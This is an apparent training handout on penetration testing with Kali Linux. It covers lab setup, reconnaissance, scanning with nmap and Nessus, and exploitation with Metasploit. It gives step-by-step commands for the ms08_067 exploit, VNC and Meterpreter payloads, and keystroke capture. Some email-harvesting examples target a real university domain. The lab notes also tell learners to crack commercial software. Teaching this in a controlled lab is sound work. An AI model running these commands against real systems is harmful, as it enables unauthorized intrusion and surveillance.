Network Security: Penetration Testing Using KALI LINUX

Mr. Marlon I. Tayag

MIS Director

CISCO LMC
CCNA, CCAI NC-II / NC-IV Comptia NCP+ Fluke CTTA Apple and Android Developer

TRAINING DESCRIPTION
This training is targeted toward Information Technology (IT) professional who has networking and administrative skills in TCP/IP networks and familiarity with Windows and basic Linux commands, and who wants to learn foundational knowledge in network security topics by means of using penetration testing methodology using KALI Linux in a controlled laboratory environment

How Security Evolved

What is Network Security?

Consists of the provisions and policies adopted by a network administrator to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources. Network security involves the authorization of access to data in a network, which is controlled by the network administrator.

Why do we need security?

Protect vital information while still allowing access to those who need it
Trade secrets, medical records, etc.

Provide authentication and access control for resources

Guarantee availability of resources

Ex: 5 9s (99.999% reliability)

Security Facts
Two fundamental security facts:
1. 2. All complex software programs have flaw/bugs The extraordinarily difficult to build hardware/software not vulnerable to attack

Who is vulnerable?
Financial institutions and banks Internet service providers Pharmaceutical companies Government and defense agencies Contractors to various government agencies Multinational corporations ANYONE ON THE NETWORK

Who are the Attackers?

Elite hackers
Characterized by technical expertise and dogged persistence, not just a bag of tools

Virus writers and releasers Script kiddies: limited but numerous Criminals are growing rapidly Employees, Consultants, and Contractors

Cyberterrorism and Cyberwar

Motivation for Hackers:

The challenge... because its there! Ego Espionage Ideology Mischief Money (extortion or theft) Revenge

5 Categories of Hackers
White-Hat Gray-Hat Black-Hat Script-Kiddie Hacktivist

Hackers are Everywhere

Stealing data
Industrial Espionage Identity theft Defamation

Deleting data for fun

A lot of bored 16 year olds late at night
Mafia Boy

Turning computers into zombies

To commit crimes Take down networks Distribute porn Harass someone

Hacking Group
Philker Hackers, responsible for the attacks on the PNRI, FDA and OVP websites.

The Case of the I Love You Virus

Onel de Guzman, the Philippine dropout who, in August 2000, created and unleashed a remarkably dangerous computer virus called I LOVE YOU, cost several companies, governments, and citizens billions of US dollars in damages. In August of the same year, charges against him in our country were dismissed, mainly because we had not yet passed legislation addressing the crimes he had committed. The public around the world is justifiably outraged.

Types Attacks
Classify as passive or active
Passive attacks are eavesdropping
Release of message contents Traffic analysis Are hard to detect so aim to prevent

Active attacks modify/fake data

Masquerade Replay Modification Denial of service

Goals of Security
Prevention
Prevent attackers from violating security policy

Detection
Detect attackers violation of security policy

Recovery
Stop attack, assess and repair damage Continue to function correctly even if attack succeeds

 To protect yourself you have to know how you enemies think.

What is Penetration Testing

Penetration testing is the legal and authorized attempt to exploit a computer system with the intent of making a network or system more secure. The process includes scanning systems looking for weak spots, and launching attacks and prove that the system is vulnerable to attack from a real hacker.

Penetration Testing
Takes and identified port, associated service which contains vulnerabilities Uses an exploit to gain unauthorized access to the target system Tools include Metasploit, CANVAS, & Core IMPACT

Why Hack Yourself

Security assessments help organizations to: Understand threats for better defense
Determine risk to make informed IT decisions Test incident handling procedures, intrusion detection systems, and other security implementation

Ethical Hacking
Information Gathering Social Engineering Password Cracking (remote & local) War Dialing Wireless (WifI, Bluetooth) VoIP, Blackberry, Smartphones, etc...

THE USE AND CREATION OF A HACKING LAB

Every ethical hacker must have a place to practice and explore. Most newcomers are confused about how they can learn to use hacking tools without breaking the law or attacking unauthorized targets. This is most often accomplished through the creation of a personal hacking lab. A hacking lab is a sandboxed environment where your traffic and attacks have no chance of escaping or reaching unauthorized and unintended targets. In this environment, you are free to explore all the various tools and techniques without fear that some traffic or attack will escape your network.

Hacking Lab Topology

Tools of the Trade: KALI Linux

Kali Linux is a distribution based on the Debian GNU/Linux distribution aimed at digital forensics and penetration testing users maintained and funded by Offensive Security. It was developed by Offensive Security as the successor to BackTrack Linux.

the quieter you become, the more you are able to hear

PC 1
User: Victim1 Password: 12345 DNS sub-domain name : victim1.petshop.com IP Address : 192.168.1.3 /24 Intranet Service:
Web Server - Apache Web Server Email Server Kerio Mail Server Telnet FTP Server

PC 2
User: Victim2 Password: 12345 DNS sub-domain name : victim2.petshop.com IP Address : 192.168.1.3 /24 Intranet Service:
DNS Server Simple DNS Telnet FTP Server Hardware: Web Cam

DNS Installation and Configuration

Install Simple DNS with zone transfer enable
Note: For educational purpose our copy of SDNS need to be crack in order to run

Configure domain names

www.petshop.com victim1.petshop.com victim2.petshop.com mail.petshop.com - for the MX record

Note: Use Quick Records to configure web, ftp, MX domain and add new A-Record for the rest of the sub-domains

Web Server Configuration

Install and test Apache Web Server From the work file directory copy all sample site files to htdocs folder. Test web browsing by using configured domain name.

Email Configuration
Install Kerio Mail Server trial copy Create the following emails (POP3) for web mail accounts, with defaults password of 12345
victim1@petshop.com victim2@petshop.com Note : Test email by sending emails from each accounts

FTP Server Configurations

Install Filezilla FTP Server on both victim PC Create the following accounts:
PC1
Username : victim1 Password:12345

PC2
Username : victim2 Password:1234

Test FTP connections by downloading and uploading files using CLI

Telnet Configurations
Activate TELNET service on each victim PC Test Telnet connections

Procedures :

1. Go to command prompt 2. Type services.msc 3. Search for Telnet services and activate

KALI Linux Admin Account

User Name : root Password: toor

Configure KALI Linux IP Address

Basic Linux Console Commands To view IP Settings ifconfig To Configure IP Address Interface ifconfig eth0 192.168.1.2/24 Bring up an interface ifconfig eth0 up Bring down an interface ifconfig eth0 down Configure DHCP dhclient eth0 Basic Linux Console Commands To configure Gateway route add default gw 192.168.1.1 To configure name server
echo nameserver 8.8.8.8 > /etc/resolv.conf

Persistent Configuration vi /etc/network/interfaces

PHASES OF A PENETRATION TESTING

Phase 1: Reconnaissance
This phase deals with information gathering about the target. the more information you collect on your target, the more likely you are to succeed

If I had six hours to chop down a tree, Id spend the first four of them sharpening my axe.

1.1 Google Hacking

When a site administrator attempt to add his site to Google search engine to be available for search in special term query, Google use automated spider or Google boters to crawl this site to Google cache server (find the documents, files, code pages copy all these information to Google search engine server) this cached page will contain the site name , the site URL ,the site content that match your search query and this cached page is what we see in the result page of our search and when the user click on any of these cached pages he or she will be redirected to the host server that really contain these pages.

Google hacking Result Categories:

1. Error message Error message contains rich data , which can be used to gain access to the server. 2. Directories browsing This makes you able to navigate inside the directories that contain the hosted website 3. File Browsing In case we have access to website directory then we are free to access to any document that founded inside this directory such as word document, excel separate sheets, access DB, WSFTP logs, and source Code

Google hacking Result Categories:

cont.
4. Network device Such as printers, webcams, and network routers that mainly give the hacker away to control the behavior of these devices 5. Personal information gathering Search using @ symbol will return all the pages that contain email addresses in the cached content site, which allow spammers to send mail to all this mails

Google Directives
Directives are keywords that enable a user to accurately extract information from the Google Index.

Google Directives Hands-On

Go to Google.com Type nelson bulanadi hau.edu.ph

Google Directives
To properly use a Google directive, you need three things: 1. The name of the directive you want to use 2. A colon 3. The term you want to use in the directive

site:domain term(s) to search

Using Index of syntax to find sites enabled with Index browsing

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories.

site:domain indexof /admin

Google filetype: Directive

The filetype: directive is use to utilize the search for specific file extensions. This is extremely useful for finding specific types of files on your targets website. For example, to return only hits that contain PDF documents, you would issue the following command: site:domainname filetype:pdf

1.2. Email Harvesting

It is the process of obtaining lists of email addresses using various methods for use in bulk email or other purposes usually grouped as spam.

theharvester
Program use to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.

Usage: root@kali:/usr/bin# theharvester -d hau.edu.ph -l 10 -b google

msfconsole
The msfconsole is probably the most popular interface to the MSF. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Usage: 1. Go to root console 2. Type msfconsole 3. Type use gather/search_email_collector 4. Type set domain hau.edu.ph 5. Type exploit

NSLookup
Network administration command-line tool available for many computer operating systems use for querying the Domain Name System (DNS) to obtain domain name or IP address mapping or for any other specific DNS record.

Usage:
nslookup target_domain

WHOIS
A query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information. For Philippines .ph extension whois domain registrant is PH.NET Usage:

whois target_domain

Netcraft
Netcraft is an Internet services company based in Bath, England. Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Usage: 1. Open web browser and go to http://news.netcraft.com 2. Type the domain on the

Dig
Replacement for nslookup for domain information search Usage: dig @target_ip dig @target_ip example.com t AXFR

Phase 2: Scanning
Is the process of examining the activity on a network, which can include monitoring data flow as well as monitoring the functioning of network devices. Network Scanning serves to promote both the security and performance of a network. Network Scanning may also be employed from outside a network in order to identify potential network vulnerabilities.

Scanning Process Steps

1. Determining if a system is alive 2. Port scanning the system 3. Scanning the system for vulnerabilities

Step 1: Determine Target System is Alive

It is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make note of any machines that respond as alive.

Step 2: Identifying Ports

It is the process of identifying the specific ports and services running a particular host. Simply defined, ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Step 3: Vulnerability Scanning

Vulnerability scanning is the process of locating and identifying known weaknesses in the services and software running on a target machine. The discovery of known vulnerabilities on a target system can be like finding the pot of gold at the end of a rainbow. Many systems today can be exploited directly with little or no skill when a machine is discovered to have a known vulnerability.

2.1 Ping and Ping Sweeps

Pings and ping sweeps A ping is a special type of network packet called an ICM P packet. Pings work by sending specific types of network traffic, called ICM P Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond back to the originating machine with an Echo Reply packet.

Ping Sweep
A ping sweep is a series of pings that are automatically sent to a range of IP addresses, rather than manually entering the individual targets address.

fping
A program that sends ICMP echo probes to network hosts, similar to ping, but much better performing when pinging multiple hosts. Usage: fping fping Example: fping fping -a target_ip -a target_ip_beginning target_ip_end >file -a 172.16.41.172 -a -g 172.16.41.1 172.16.41.190 >host.txt

-a = show live host -g = specify ip range

Port Scanning
The act of systematically scanning a computer's ports. Since a port is a place where information goes into and out of a computer, port scanning identifies open doors to a computer. Port scanning has legitimate uses in managing networks, but port scanning also can be malicious in nature if someone is looking for a weakened access point to break into your computer.

Three-Way Handshake
When two machines on any given network want to communicate using TCP, they do so by completing the threeway handshake. When two computers want to talk, they go through a similar process. The first computer connects to the second computer by sending a SYN packet to a specified port number. If the second computer is listening, it will respond with a SYN/ACK . When the first computer receives the SYN/ACK , it replies with an ACK packet. At this point, the two machines can communicate normally.

Nmap
Is a security scanner used to discover Host and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyses the responses.

NMAP Basics
Nmap has 6 stats: open, closed, filtered, unfiltered, open|filtered, or closed|filtered. Open This means that the port actively accepted a connection that we tried to establish with it. Closed Means the host is up and responding but no services are running on that port, also indicates the need of a firewall Filtered NMAP couldnt get to the port because there was some sort of firewall or routing rules in the way. Unfiltered port is accessible but couldnt tell if it was open or closed.

Using Nmap to Perform a TCP Connect Scan

This scan is often considered the most basic and stable of all the port scans because Nmap attempts to complete the three-way handshake on each port specified in the Nmap command. Usage: TCP Connect Scan nmap sT -p- -PN 172.16.45.135 TCP IP Range Scan nmap sT -p- -PN 172.16.45.1-254 Host OS Discovery nmap sS P0 sV O 192.168.1.1 -s T -p-PN = = = = what kind of scan to run type of scan scan all ports skip host discovery phase

Using Nmap to Perform UDP Scans

UDP is an acronym for User Datagram Protocol. UDP is said to be connectionless because the sender simply sends packets to the receiver with no mechanism for ensuring that the packets arrive at the destination. It is important to remember that not every service utilizes TCP. Usage: nmap sU 172.16.45.129

Vulnerability Scanning
A vulnerability is a weakness in the software or system configuration that can be exploited. Vulnerabilities can come in many forms but most often they are associated with missing patches.

Nessus
Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems.

Installing Nessus
1. To install Nessus, you need to complete the following steps: 2. Download the installer from www.nessus.org. 3. Register for a key on the Nessus website by submitting your e-mail address. 4. The Nessus crew will e-mail you a unique product key that can be used to register the product. 5. Install the program. 6. Create a Nessus user to access the system. 7. Update the plug-ins.

Using Nessus
To run Nessus 1. Open browser type https://kali:8834 2. Username: admin Password: adminkali 3. Create new scans and scan 4. After finishing scan click results

Troubleshooting Nessus
Nessus not running on browser , start nessus service by typing the command service nessusd start or /etc/init.d/nessud start

Sample Vulnerability Results

Critical Issues Found On The System

Phase 3: Exploitation
Exploitation is the process of gaining control over a system. This process can take many different forms but the end goal always remains the same: administrative-level access to the computer. Exploitation is the attempt to turn the target machine into a puppet that will execute your commands and do your bidding. Just to be clear, exploitation is the process of launching an exploit. Exploits are issues or bugs in the software code that allow a hacker or attacker to alter the original functionality of the software.

Metasploit: Hacking Swordfish Style

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

Using Metasploit
To run Metasploit 1. Go to root console 2. Type msfconsole Note: Starting the Msfconsole takes between 10 and 30 seconds, so do not panic if nothing happens for a few moments. To update (You can update metasploit in two ways) 1. On the root console type msfupdate or 2. Inside msfconsole afte the msf> prompt type msfupdate

Metasploit Terminology
Exploit - is a pre-packaged collection of code that gets sent to a remote system, Exploits are the weaknesses that allow the attacker to execute remote code (payloads) on the target system.

Payload - is also a small snippet of code that is used to perform some task like installing new software, creating new users, or opening backdoors to the system. These are software or functionality that installs on the target system once the exploit has been successfully executed.

Using Nessus Output To Attack System With Metasploit

Recall that Nessus is a vulnerability scanner and provides us with a list of known weaknesses or missing patches. When reviewing the Nessus output, you should make notes of any findings but pay special attention to the vulnerabilities labeled as High or Critical Many High or Critical Nessus vulnerabilities, especially missing Microsoft patches, correlate directly with Metasploit exploits.

Sample Vulnerability Results

Critical Issues Found On The System

Exploiting Vulnerabilities
Inside msfconsole look for exploits pertaining to the vulnerabilities msf > search ms08-067

Note: If you are encountering [!] Database not connected or cache not built, using slow search , exit msfconsole by typing exit. On the root console type service postgresql start , the return to msfconsole and do the search again

Using The Exploit

To use the exploit msf > use exploit/windows/smb/ms08_067_netapi To show payloads msf exploit(ms08_067_netapi) > show payload Select payload
msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp

Show options for payloads msf exploit(ms08_067_netapi) > show options

Using The Exploit

Setting the options msf exploit(ms08_067_netapi) > set rhost 192.168.138.134 RHOST target IP msf exploit(ms08_067_netapi) > set lhost 192.168.138.135 LHOST local IP Run exploit msf exploit(ms08_067_netapi) > exploit

Sample of Payloads Available for Targeting Windows Machines

Reverse_TCP vs. Bind_TCP

In a bind payload, the attacker is sending the exploit and making a connection to the target from the attacking machine. In this instance, the attacker sends the exploit to the target and the target waits passively for a connection to come in. After sending the exploit, the attackers machine then connects to the target. In a reverse payload, the attacking machine sends the exploit but forces the target machine to connect back to the attacker. In this type of attack, rather than passively waiting for an incoming connection on a specified port or service, the target machine actively makes a connection back to the attacker.

Hands-On: Metasploit
1. Attack the using msfconsole 2. Select windows/adduser for the payload 3. Use telnet to connect to the victim using the new user account

Meterpreter: Getting the shell

The Meta-Interpreter, or Meterpreter, is a payload available in Metasploit that gives attackers a powerful command shell that can be used to interact with their target. Another big advantage of the Meterpreter is the fact that it runs entirely in memory and never utilizes the hard drive. This tactic provides a layer of stealth that helps it evade many antivirus systems and confounds some forensic tools.

Using Meterpreter Payload

Hands-On: Meterpreter
Use meterpreter to capture and save keystroke. Use to execute mspaint and notepad on the target machine

Armitage: Point and Click Hacking

Armitage is a front-end for Metasploit built with ease-of-use in mind. Armitage visualizes your attack situation, recommends the right exploits, manages post-exploitation, and makes pivoting easy to use

Using Armitage
1. At the root console type armitage 2. On the Connect dialog box click connect

3. Click YES to start Metasploit RPC Server and wait .

Using Armitage
4. To scan host, on the Host menu select MSF scan. Enter specific IP address or network range (ex: 192.168.1.0/24) 5. Target Machine will appear with corresponding IP address and OS information 6. To attack specific machine. Click or select machine and on the Attacks menu select Find Attacks. All possible exploit will be queried against the target machine 7. To implement exploit, right-click target machine and select exploit to deploy

ARP Poisoning: Man in the Middle Attack